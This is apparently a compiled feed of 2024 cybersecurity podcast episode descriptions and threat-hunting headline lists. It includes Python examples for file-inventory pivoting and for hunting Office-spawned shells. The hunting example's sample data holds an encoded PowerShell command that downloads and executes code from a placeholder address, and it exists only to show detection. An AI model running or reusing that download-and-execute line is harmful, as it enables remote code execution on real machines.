Looking Ahead to 2025 (00:32:44)
Supply Chain Pressures (00:35:08)
Arms Race in Security (00:35:27)
Liability Hot Potato (00:36:27)
Managed Services Growth (00:36:44)
Cyber Insurance Trends (00:37:52)
CISO Evolution (00:39:10)
The Importance of Trust in Supply Chain (00:39:56)
Predictions for Cybersecurity Roles (00:40:46)
Following BlackBerry's Work (00:41:00)
Networking and Future Conversations (00:41:05)
Conclusion (00:41:37)
Become a Member: https://danielmiessler.com/upgrade
See omnystudio.com/listener for privacy information.
Threat Hunting Workshop: Hunting for Command and Control 31 July 2024 | 12:00 - 1:00 pm ET Register Here!
Black Hat 2024 Training with Lee Archinal "A Beginner's Guide to Threat Hunting: How to Shift Focus from IOCs to Behaviors and TTPs" | Secure your spot now at a discounted rate: 3-4 Aug 2024: Sign Up Here! 5-6 Aug 2024: Sign Up Here!
-----
Top 5 Threat Hunting Headlines - 29 July 2024
1. Bleeping Computer | Acronis Warns of Cyber Infrastructure Default Password Abused in Attacks https://www.bleepingcomputer.com/news/security/acronis-warns-of-cyber-infrastructure-default-password-abused-in-attacks/?&web_view=true
2. Guardio Labs | “EchoSpoofing” – A Massive Phishing Campaign Exploiting Proofpoint's Email Protection to Dispatch Millions of Perfectly Spoofed Emails https://labs.guard.io/echospoofing-a-massive-phishing-campaign-exploiting-proofpoints-email-protection-to-dispatch-3dd6b5417db6?gi=b32e776ffab3
3. eSentire | Introducing Gh0stGambit: A Dropper for Deploying Gh0st RAT https://www.esentire.com/blog/a-dropper-for-deploying-gh0st-rat?&web_view=true
4. Check Point Research | Stargazers Ghost Network https://research.checkpoint.com/2024/stargazers-ghost-network/
5. Help Net Security | Most CISOs Feel Unprepared for New Compliance Regulations https://www.helpnetsecurity.com/2024/07/26/cisos-compliance-regulations-preparedness/?web_view=true
Guest: Allyn Stott, Senior Staff Engineer, meoward.co
On LinkedIn | https://www.linkedin.com/in/whyallyn
On Twitter | https://x.com/whyallyn
Host: Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber]
On ITSPmagazine | https://www.itspmagazine.com/sean-martin
Episode Notes
In this episode of The Redefining CyberSecurity Podcast, host Sean Martin converses with Allyn Stott, who shares his insights on rethinking how we measure detection and response in cybersecurity. The episode explores the nuances of cybersecurity metrics, emphasizing that it's not just about having metrics, but having the right metrics that truly reflect the effectiveness and efficiency of a security program.
Stott discusses his journey from red team operations to blue team roles, where he has focused on detection and response. His dual perspective provides a nuanced understanding of both offensive and defensive security strategies. Stott highlights a common issue in cybersecurity: the misalignment of metrics with organizational goals. He points out that many teams inherit metrics that may not accurately reflect their current state or objectives. Instead, metrics should be strategically chosen to guide decision-making and improve security posture. One of his key messages is the importance of understanding what specific metrics are meant to convey and ensuring they are directly actionable.
In his framework, aptly named SAVER (Streamlined, Awareness, Vigilance, Exploration, Readiness), Stott outlines a holistic approach to security metrics. Streamlined focuses on operational efficiencies achieved through better tools and processes. Awareness pertains to the dissemination of threat intelligence and ensuring that the most critical information is shared across the organization. Vigilance involves preparing for and understanding top threats through informed threat hunting. Exploration encourages the proactive discovery of vulnerabilities and security gaps through threat hunts and incident analysis. Finally, Readiness measures the preparedness and efficacy of incident response plans, emphasizing the coverage and completeness of playbooks over mere response times.
Martin and Stott also discuss the challenge of metrics in smaller organizations, where resources may be limited. Stott suggests that simplicity can be powerful, advocating for a focus on key risks and leveraging publicly available threat intelligence. His advice to smaller teams is to prioritize understanding the most significant threats and tailoring responses accordingly.
The conversation underscores a critical point: metrics should not just quantify performance but also drive strategic improvements. By asking the right questions and focusing on actionable insights, cybersecurity teams can better align their efforts with their organization's broader goals.
For those interested in further insights, Stott mentions his upcoming talks at BSides Las Vegas and Blue Team Con in Chicago, where he will expand on these concepts and share more about his Threat Detection and Response Maturity Model.
In conclusion, this episode serves as a valuable guide for cybersecurity professionals looking to refine their approach to metrics, making them more meaningful and aligned with their organization's strategic objectives.
Top 5 Threat Hunting Headlines - 22 July 2024
1. The Record | Popular Ukrainian Telegram Channels Hacked to Spread Russian Propaganda https://therecord.media/ukrainian-news-telegram-channels-hacked-russian-propaganda?&web_view=true
2. Trend Micro | New Play Ransomware Linux Variant Targets ESXi, Shows Ties with Prolific Puma https://www.trendmicro.com/en_us/research/24/g/new-play-ransomware-linux-variant-targets-esxi-shows-ties-with-p.html
3. Dragos | FrostyGoop Report https://regmedia.co.uk/2024/07/23/dragos_frostygoop-report.pdf
4. CrowdStrike | Likely eCrime Actor Capitalizing on Falcon Sensor Issues https://www.crowdstrike.com/blog/likely-ecrime-actor-capitalizing-on-falcon-sensor-issues/
5. Europol | Internet Organised Crime Threat Assessment (IOCTA) 2024 https://www.europol.europa.eu/cms/sites/default/files/documents/Internet%20Organised%20Crime%20Threat%20Assessment%20IOCTA%202024.pdf
This month, we welcome Eric Gagnon, Team Lead of Adversary Simulation, Purple Teaming, and Tradecraft Development at Desjardins. The conversation covers a wide range of topics related to cybersecurity, including purple teaming, red teaming, blue teaming, and Eric's journey in cybersecurity. Eric shares insights on certifications, threat hunting, cloud security, and the importance of knowledge exchange between red and blue teams. He also discusses the use of AI in cybersecurity and the need to stay sharp in the field.
Takeaways
Purple teaming involves collaborative operations to exchange ideas, evaluate security controls, and test the tactics, techniques, and procedures (TTPs) real threat actors use.
Certifications in cybersecurity, such as Offensive Security Certified Professional (OSCP) and Offensive Security Certified Expert (OSCE), provide valuable knowledge and an edge in the field.
Threat hunting involves looking for granular activity that may indicate a compromise, filtering out the noise, and focusing on the suspicious behavior of threat actors.
Cloud security requires automation, cyber hygiene, and visibility, focusing on prioritizing techniques and testing them against the enterprise's environment.
Knowledge exchange between red and blue teams during a purple team engagement is essential and should include a common language, centralized documentation, and reporting against the MITRE ATT&CK framework.
Staying sharp in cybersecurity involves continuous learning, participation in CTFs, engaging with passionate individuals, and challenging oneself through talks, podcasts, and specialized training.
Chapters
00:00 Introduction to Purple Teaming and Cybersecurity Journey
08:09 Certifications and Insights in Cybersecurity
15:08 Threat Hunting and Granular Activity Detection
35:02 Knowledge Exchange in Purple Teaming: Red and Blue Collaboration
39:57 Staying Sharp in Cybersecurity: Continuous Learning and Engagement
Secure applications from code to cloud. Prisma Cloud, the most complete cloud-native application protection platform (CNAPP).
Disclaimer: This post contains affiliate links. If you make a purchase, I may receive a commission at no extra cost to you.
This Soap Box edition of the show is with Mike Wiacek, the CEO and Founder of Stairwell. Stairwell is a platform that creates something similar to an NDR, but for file analysis instead of network traffic. The idea is you get a copy of every unique file in your environment to the Stairwell platform, via a file forwarding agent. You get an inventory that lists where these files exist in your environment, at what times, and from there you can start doing analysis. If you find a dodgy file you can do all the usual malware analysis type stuff, but you can also do things like immediately find out where else that file is in your organisation, or even where else it was. From there you can identify other files that are similar – variants of those files – and search for those. And you can unpack all this very, very quickly. This is the type of tool that EDR companies use internally to do threat hunting, but it's just for you and your org – you can drive it. And as you'll hear, the idea of a transparent, customisable and programmable security stack is something that's on-trend at the moment. Mike lays out the case that doing this sort of file analysis in your organisation makes a whole lot of sense.
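The inventory-then-pivot workflow Mike describes, as an added example that is not Stairwell's code: a small Python model of a file inventory keyed by SHA-256 that records every host, path and time a file was seen, answers "where else is (or was) this file", and finds variants of it. The variant search uses Jaccard similarity over fixed-size chunk hashes, a deliberately simple stand-in for whatever the real platform uses, and the threshold is this example's choice. The three sample files (two builds of a dropper that share a header and payload but differ in their embedded C2 config, plus an unrelated document) are constructed byte strings, and the host names and paths are made up.

```python
"""File inventory with "where else is this file" and variant search.

Added example modelled on the workflow described in the episode; it is not
Stairwell's code. Exact matches use SHA-256; similarity uses chunk-hash
Jaccard as a simple stand-in for real variant matching. Sample files, hosts
and paths are constructed.
"""
import hashlib
from collections import defaultdict

CHUNK = 64  # bytes per chunk for the similarity stand-in; tiny because samples are tiny


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def chunk_hashes(data: bytes) -> set:
    """Hashes of fixed-size chunks; builds that share code or data share chunks."""
    return {sha256(data[i:i + CHUNK]) for i in range(0, len(data), CHUNK)}


class Inventory:
    """One copy of every unique file plus every sighting of it."""

    def __init__(self):
        self.contents = {}                   # sha256 -> bytes
        self.sightings = defaultdict(list)   # sha256 -> [(host, path, seen_at)]

    def ingest(self, host: str, path: str, data: bytes, seen_at: str) -> str:
        """What a forwarding agent does: ship each unique file once, log every sighting."""
        h = sha256(data)
        self.contents.setdefault(h, data)
        self.sightings[h].append((host, path, seen_at))
        return h

    def where(self, h: str) -> list:
        """Every place this exact file has been seen, past sightings included."""
        return sorted(self.sightings.get(h, []))

    def similar(self, h: str, threshold: float = 0.5) -> list:
        """Other files whose chunk-hash Jaccard similarity to h is at least threshold."""
        base = chunk_hashes(self.contents[h])
        hits = []
        for other, data in self.contents.items():
            if other == h:
                continue
            oc = chunk_hashes(data)
            score = len(base & oc) / len(base | oc)
            if score >= threshold:
                hits.append((other, round(score, 2)))
        return sorted(hits, key=lambda t: -t[1])

    def pivot(self, h: str, threshold: float = 0.5) -> dict:
        """Start from one dodgy file: where it is, then its variants and where they are."""
        hits = {h: self.where(h)}
        for other, _score in self.similar(h, threshold):
            hits[other] = self.where(other)
        return hits


# Constructed sample files: two dropper builds share a header and payload but
# carry different embedded C2 configs; the document is unrelated to both.
HEADER = b"MZ" + b"\x90" * 126                     # 128 bytes -> 2 chunks
PAYLOAD = bytes(range(256))                       # 256 bytes -> 4 chunks
CONFIG_V1 = b"c2=203.0.113.7".ljust(CHUNK, b"\x00")    # 1 chunk
CONFIG_V2 = b"c2=198.51.100.20".ljust(CHUNK, b"\x00")  # 1 chunk
DROPPER_V1 = HEADER + PAYLOAD + CONFIG_V1
DROPPER_V2 = HEADER + PAYLOAD + CONFIG_V2
DOCUMENT = b"quarterly report draft, nothing to see here. " * 5


def build_demo_inventory():
    """Populate an inventory from constructed sightings; returns it plus the hashes."""
    inv = Inventory()
    h1 = inv.ingest("ws-01", r"C:\Users\alice\AppData\Local\Temp\update.exe", DROPPER_V1, "2024-07-01T09:14Z")
    inv.ingest("ws-02", r"C:\Users\bob\Downloads\update.exe", DROPPER_V1, "2024-07-01T09:20Z")
    h2 = inv.ingest("srv-03", r"C:\ProgramData\svc\update.exe", DROPPER_V2, "2024-07-02T03:41Z")
    hd = inv.ingest("ws-01", r"C:\Users\alice\Documents\report.docx", DOCUMENT, "2024-06-28T11:00Z")
    return inv, h1, h2, hd


if __name__ == "__main__":
    inv, h1, h2, hd = build_demo_inventory()
    print("where else:", inv.where(h1))
    print("variants:", inv.similar(h1))
    print("pivot:", inv.pivot(h1))
```

Starting from the dropper found on ws-01, `where` immediately shows the second copy on ws-02, `similar` scores the rebuilt dropper on srv-03 at 0.75 (six of eight distinct chunks shared, only the config block differs), and `pivot` returns both hashes with every host they were seen on. The document scores zero against either build and never appears.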
Top 5 Threat Hunting Headlines - 15 July 2024
1. Infosecurity Magazine | CISA Urges Software Makers to Eliminate OS Command Injection Flaws https://www.infosecurity-magazine.com/news/cisa-software-eliminate-command/?&web_view=true
2. Wazuh | Detecting Living Off the Land Attacks with Wazuh https://wazuh.com/blog/detecting-living-off-the-land-attacks-with-wazuh/
3. McAfee Labs | ClickFix Deception: A Social Engineering Tactic to Deploy Malware https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/
4. The Hacker News | 10,000 Victims a Day: Infostealer Garden of Low-Hanging Fruit https://thehackernews.com/2024/07/10000-victims-day-infostealer-garden-of.html?m=1
5. BlackBerry | Coyote Banking Trojan Targets LATAM with a Focus on Brazilian Financial Institutions https://blogs.blackberry.com/en/2024/07/coyote-banking-trojan-targets-latam-with-a-focus-on-brazilian-financial-institutions?&web_view=true
In this episode of Detection at Scale, Jack welcomes Christopher Watkins, Senior Staff Cloud Security Engineer at WP Engine, to discuss innovative logging solutions and efficient data management across multiple cloud platforms. Chris reveals how WP Engine leverages native tools and robust API gateways to streamline logging processes. He shares strategies for cost-effective threat hunting, such as optimizing large-scale queries through table partitioning. Chris also emphasizes the importance of mental and physical well-being, and the role of community support in maintaining a sustainable career in cybersecurity. Topics discussed: How WP Engine uses native tools and robust API gateways to manage logging across multiple cloud platforms efficiently. Strategies for optimizing large-scale queries, such as table partitioning and avoiding costly operations, to maintain efficiency and reduce expenses. Techniques for moving data efficiently across different cloud services, ensuring consistency and reliability in data management. The importance of partitioning tables and being selective with queries to enhance threat detection and incident response efforts. The role of a well-designed schema in speeding up threat detection by understanding key value pairs frequently used in security data. Leveraging best practices from data teams to optimize queries and improve security use cases. Ensuring human oversight with two-person reviews of scripts and dry runs to maintain accuracy and reliability in automated processes. The importance of mental, physical, and spiritual health routines to manage the stress of incident response and avoid burnout. The role of community and trusted conversations in sharing experiences about breaches, vulnerabilities, and other challenges in the cybersecurity field. How WP Engine's mantra of "detection as code" and "pipelines as code" extends to response workflows for increased efficiency and effectiveness. 
Resources Mentioned: Chris Watkins on LinkedIn WP Engine website
Top 5 Threat Hunting Headlines - 1 July 2024
1. Qualys Security Blog | regreSSHion: Remote Unauthenticated Code Execution Vulnerability in OpenSSH Server https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server?web_view=true
2. Zscaler | Kimsuky Deploys TRANSLATEXT to Target South Korean Academia https://www.zscaler.com/blogs/security-research/kimsuky-deploys-translatext-target-south-korean-academia
3. The Register | Police Allege 'Evil Twin' In-Flight WiFi Used to Steal Info https://www.theregister.com/2024/07/01/australia_evil_twin_wifi_airline_attack/?&web_view=true and Australian Federal Police | Man Charged Over Creation of 'Evil Twin' Free WiFi Networks to Access Personal Data https://www.afp.gov.au/news-centre/media-release/man-charged-over-creation-evil-twin-free-wifi-networks-access-personal
4. GitHub | JPCERTCC/LogonTracer https://github.com/JPCERTCC/LogonTracer
5. Help Net Security | 75% of New Vulnerabilities Exploited Within 19 Days https://www.helpnetsecurity.com/2024/06/27/nvd-vulnerabilities/?web_view=true
Top 5 Threat Hunting Headlines - 25 June 2024
1. Positive Technologies | ExCobalt: GoRed, the hidden-tunnel technique https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/excobalt-gored-the-hidden-tunnel-technique/
2. Cisco Talos | SneakyChef espionage group targets government agencies with SugarGh0st and more infection techniques https://blog.talosintelligence.com/sneakychef-sugarghost-rat/
3. Help Net Security | 1 out of 3 breaches go undetected https://www.helpnetsecurity.com/2024/06/24/detecting-breaches-struggle-in-organizations/?web_view=true
4. Ars Technica | Dell said return to office or else - nearly half of the workers chose "or else" https://arstechnica.com/gadgets/2024/06/nearly-half-of-dells-workforce-refused-to-return-to-the-office/
5. Infosecurity Magazine | Cybersecurity Burnout Costing Firms $700m+ Annually https://www.infosecurity-magazine.com/news/cybersecurity-burnout-costing-700m/?&web_view=true
Top 5 Threat Hunting Headlines - 10 June 2024
1. Google Cloud | UNC5537 Targets Snowflake Customer Instances for Data Theft and Extortion https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion
2. Morphisec | Howling at the Inbox: Sticky Werewolf's Latest Malicious Aviation Attacks https://blog.morphisec.com/sticky-werewolfs-aviation-attacks
3. Vonahi Security | Automated Penetration Testing & Cyber Security Services - Top 10 Critical Pentest Findings Report https://www.vonahi.io/pentest-report-2024?utm=source=701Rp00000B6bue
4. The DFIR Report | IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/
5. Zscaler | Technical Analysis of the Latest Variant of ValleyRAT https://www.zscaler.com/blogs/security-research/technical-analysis-latest-variant-valleyrat
On this episode of The Cybersecurity Defenders Podcast, we talk network threat hunting with Chris Brenton, COO at Active Countermeasures.
Chris is a dedicated professional with a passion for simplifying the process of threat hunting. He is deeply committed to enhancing cybersecurity knowledge through delivering both free and affordable security training. Alongside this, he plays a crucial role in the development of both open-source and commercially available threat hunting tools. Whether you're aiming to sharpen your threat hunting skills or are looking to establish a robust threat hunting program within your organization, Chris is the go-to expert. Stay tuned as we dive deeper into his journey, and feel free to reach out to him directly to learn more or get involved.
You can find Chris on LinkedIn here.
And you can find Chris on Twitter here.
In this episode, PhoneBoy talks about how AI can be used for Threat Hunting.
How AI turbocharges your threat hunting game
5 ways ChatGPT and LLMs can advance cyber security
Top 5 Threat Hunting Headlines - 22 May 2024
1. Kandji | Malware: Cuckoo Behaves Like Cross Between Infostealer and Spyware https://blog.kandji.io/malware-cuckoo-infostealer-spyware
2. Rapid7 | Ongoing Malvertising Campaign Leads to Ransomware https://www.rapid7.com/blog/post/2024/05/13/ongoing-malvertising-campaign-leads-to-ransomware/
3. Unit 42 | Payload Trends in Malicious OneNote Samples https://unit42.paloaltonetworks.com/payloads-in-malicious-onenote-samples/
4. Check Point Research | Bad Karma, No Justice: Void Manticore Destructive Activities in Israel https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/
5. Aqua Nautilus | Kinsing Demystified - A Comprehensive Technical Guide https://1665891.fs1.hubspotusercontent-na1.net/hubfs/1665891/Threat%20reports/AquaSecurity_Kinsing_Demystified_Technical_Guide.pdf
Have you ever noticed “threat hunting” in vendor products and wondered exactly what it means? James Williams is here to explain: Threat hunting is the R&D of detection engineering. A threat hunter imagines what an attacker might try and, critically, how that behavior would show up in the logs of a particular environment. Then the...
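The hunt loop described above (pick a hypothesis about attacker behavior, then decide what it looks like in this environment's logs and go look) can be shown end to end on a handful of process-creation events. The block below is an added example, not code from the article or from James Williams; the hypothesis ("a macro-enabled Office document spawns a shell with an encoded PowerShell command") is one of many a hunter might choose, and the event records are constructed, shaped roughly like Windows 4688 / Sysmon Event ID 1 fields. It also stacks parent-to-child process pairs by frequency, since rare pairs are where a hunter looks first.

```python
"""Hypothesis-driven hunt over constructed process-creation events.

Added example for this page, not the article's code. Field names
(host, user, parent, image, cmdline) are an assumption about how the
events were normalized; the sample events are constructed.
"""
import base64
import re
from collections import Counter

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts unambiguous prefixes of -EncodedCommand; these are the
# spellings commonly seen in the wild. The argument is base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def _enc(ps_script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(ps_script.encode("utf-16-le")).decode()


# Constructed sample: four hosts, five process-creation events.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")},
    {"host": "ws02", "user": "bob",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    # Benign admin tooling: encoded, but the parent is not an Office app, so the
    # hypothesis does not fire. Scoping the hypothesis is what keeps noise down.
    {"host": "srv01", "user": "svc_sccm",
     "parent": r"C:\Windows\CCM\CcmExec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NonInteractive -EncodedCommand " + _enc("Get-Service ccmexec")},
    {"host": "ws03", "user": "carol",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"host": "ws04", "user": "dave",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_office_to_shell(events):
    """Hypothesis: an Office process spawns a shell. Encoded PowerShell raises the priority."""
    findings = []
    for ev in events:
        parent, child = basename(ev["parent"]), basename(ev["image"])
        if parent not in OFFICE_APPS or child not in SHELLS:
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        findings.append({
            "host": ev["host"], "user": ev["user"], "parent": parent, "child": child,
            "encoded": decoded is not None, "decoded": decoded,
        })
    return findings


def stack_parent_child(events) -> Counter:
    """Frequency-stack parent->child pairs; the least common pairs are the ones to triage first."""
    return Counter((basename(e["parent"]), basename(e["image"])) for e in events)


if __name__ == "__main__":
    for f in hunt_office_to_shell(SAMPLE_EVENTS):
        print(f["host"], f["user"], f"{f['parent']} -> {f['child']}",
              "ENCODED:" if f["encoded"] else "", f["decoded"] or "")
    for pair, n in sorted(stack_parent_child(SAMPLE_EVENTS).items(), key=lambda kv: kv[1]):
        print(n, "x", " -> ".join(pair))
```

Against the constructed events the hunt returns two findings (WINWORD to powershell with a decoded download cradle on ws01, and EXCEL to cmd on ws03) and ignores the SCCM host even though its command line is encoded. Whether the Office-to-shell pair is genuinely rare is an environment question, which is exactly the point of the passage above: the same hypothesis is high-signal in one estate and routine in another, and the stacking output is how you find out which.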
Top 5 Threat Hunting Headlines - 13 May 2024
1. Infosecurity Magazine | AI-Powered Russian Network Pushes Fake Political News https://www.infosecurity-magazine.com/news/aipowered-russian-network-fake-news/?&web_view=true
2. Elastic Security Labs | Dissecting REMCOS RAT: An in-depth analysis of a widespread 2024 malware, Part Two https://www.elastic.co/security-labs/dissecting-remcos-rat-part-two
3. The Record | Cyberthreat Landscape Permanently Altered by Chinese Operations, US Officials Say https://therecord.media/cyberthreat-landscape-altered-chinese-operations?&web_view=true
4. Elastic Security Labs | Dissecting REMCOS RAT: An in-depth analysis of a widespread 2024 malware, Part Four https://www.elastic.co/security-labs/dissecting-remcos-rat-part-four
5. Help Net Security | How Secure is the "Password Protection" on Your Files and Drives? https://www.helpnetsecurity.com/2024/05/10/password-protect-pdf-excel-files/?web_view=true
Organizations fear adversaries will attack. Threat hunters assume adversaries are already in the system — and their investigations seek unusual behavior that may indicate malicious activity is afoot. Andrew Munchbach, CrowdStrike's VP of Global Enterprise Sales Engineering, joins Adam and Cristian in this week's episode to explore what threat hunting is, how it works, and what makes a good threat hunting program. As CrowdStrike's “Chief Reddit Officer”, Andrew also shares how he came to run CrowdStrike's Reddit account and discusses the platform's evolving role in communicating with the security community. Now with nearly 20,000 followers, CrowdStrike's Reddit account is used to share information — from key data on active attacks to weekly threat hunting exercises — with CrowdStrike customers and the general public.
Top 5 Threat Hunting Headlines - 22 April 2024
1. The Record | NATO to launch new cyber center to contest cyberspace 'at all times' https://therecord.media/nato-new-military-civilian-cyber-center-mons-belgium?&web_view=true
2. Securonix | Securonix Threat Research Knowledge Sharing Series: Detecting DLL Sideloading Techniques Found In Recent Real-world Malware Attack Chains https://www.securonix.com/blog/detecting-dll-sideloading-techniques-in-malware-attack-chains/
3. Dark Reading | Evil XDR: Researcher Turns Palo Alto Software Into Perfect Malware https://www.darkreading.com/application-security/evil-xdr-researcher-turns-palo-alto-software-into-perfect-malware?&web_view=true
4. HackTricks https://book.hacktricks.xyz
5. CSA | Deploying AI Systems Securely https://media.defense.gov/2024/Apr/15/2003439257/-1/-1/0/CSI-DEPLOYING-AI-SYSTEMS-SECURELY.PDF
In this episode of Storm⚡️Watch, we discuss a wide range of intriguing cybersecurity topics. A significant highlight of this episode is our discussion on the recent vulnerabilities discovered in CrushFTP. This popular file transfer software was found to have a critical remote code execution vulnerability, which has been actively exploited. The vulnerability, identified as CVE-2023-43177, allows unauthenticated attackers to execute arbitrary code and access sensitive data. Despite patches being released, the software remains a target for opportunistic attacks, emphasizing the need for users to update and secure their systems promptly. We also explore the cutting-edge realm of LLM (Large Language Model) agents with the capability to autonomously exploit and hack websites. Recent studies have shown that these agents can autonomously perform complex tasks like SQL injections and database schema extractions without prior knowledge of the vulnerabilities. This development poses new challenges and opportunities in cybersecurity, highlighting the dual-use nature of AI technologies in cyber offense and defense. Our "Tool Time" segment introduces listeners to the CPE Guesser tools, which aid in predicting Common Platform Enumeration names, helping cybersecurity professionals streamline their vulnerability management processes. In a lighter segment, "Shameless Self-Promotion," we celebrate GreyNoise's achievement of reaching '1337' status with their tagging system. We also provide updates on the latest cybersecurity trends with our "Tag Roundup," discussing recent and active campaigns, and conclude with a "KEV Roundup" where we discuss the Known Exploited Vulnerabilities catalog by CISA, providing listeners with crucial information on vulnerabilities that require immediate attention. As we wrap up the episode, we reflect on the discussions and insights shared, encouraging our listeners to stay proactive in managing cybersecurity risks. 
Forecast = The KEV drought continues well into its second week, but a vulnerable frontal system could bring some much-needed exploit rain. Storm Watch Homepage >> Learn more about GreyNoise >>
Top 5 Threat Hunting Headlines - 15 April 2024
1. Volexity | Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400) https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
2. Trend Micro | Cyberespionage Group Earth Hundun's Continuous Refinement of Waterbear and Deuterbear https://www.trendmicro.com/en_no/research/24/d/earth-hundun-waterbear-deuterbear.html
3. The Cyber Express | FatalRAT Targets Cryptocurrency Users With DLL Side-loading Techniques https://thecyberexpress.com/fatalrat-phishing-campaign/?&web_view=true
4. Elastic Security Labs | Linux detection engineering with Auditd https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd
5. NIST Special Publication | Incident Response Recommendations and Considerations for Cybersecurity Risk Management https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r3.ipd.pdf
[LIVE] Out of the Woods Podcast Episode, April 4, 2024 | 7:00 - 8:30 PM ET
Check out this interview from the ESW Vault, hand picked by main host Adrian Sanabria! This segment was originally published on September 22, 2021. Chris will discuss the relevance of intelligence and threat hunting today and how they work together. He will also talk about his EASY framework for creating impactful intelligence and its relation to hunting! Show Notes: https://securityweekly.com/vault-esw-8